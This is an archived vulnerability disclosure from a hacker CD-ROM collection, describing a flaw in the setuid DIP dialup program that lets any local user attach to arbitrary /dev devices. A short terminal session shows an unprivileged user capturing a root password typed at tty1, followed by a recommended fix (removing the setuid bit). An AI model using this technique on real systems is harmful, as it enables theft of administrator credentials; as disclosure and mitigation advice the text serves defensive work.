home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / dip-prob.txt < prev    next >
Encoding:
Text File  |  2001-11-06  |  1.0 KB  |  29 lines
  1.  
  2.    I seem to have stumbled across another vulnerability in DIP.  It
  3. appears to allow any user to gain control of arbitrary devices in /dev.
  4. For instance, I have successfully stolen keystrokes from a root login as
  5. follows...  (I could also dump characters to the root console)
  6.  
  7. $ whoami
  8. cesaro
  9. $ cat < /dev/tty1                    <------ root login here
  10. bash: /dev/tty1: Permission denied   <------ nope, we can see it
  11. $ dip -t
  12. DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
  13. Written by Fred N. van Kempen, MicroWalt Corporation.
  14.  
  15. DIP> port tty1
  16. DIP> echo on
  17. DIP> term
  18. [ Entering TERMINAL mode.  Use CTRL-] to get back ]
  19. roots_password                       <------ OH, maybe we *CAN* see it!
  20. [ Back to LOCAL mode. ]
  21. DIP> quit
  22. $
  23.  
  24. I'm sure there are many more creative things to do with this, but this is
  25. the first thing that came to mind when I discovered it, and is a good
  26. example of what can be done.  Not all devices are accessible.  I have not
  27. looked into the patch at this time, but I recommend chmod u-s dip, as
  28. usual! :)
  29.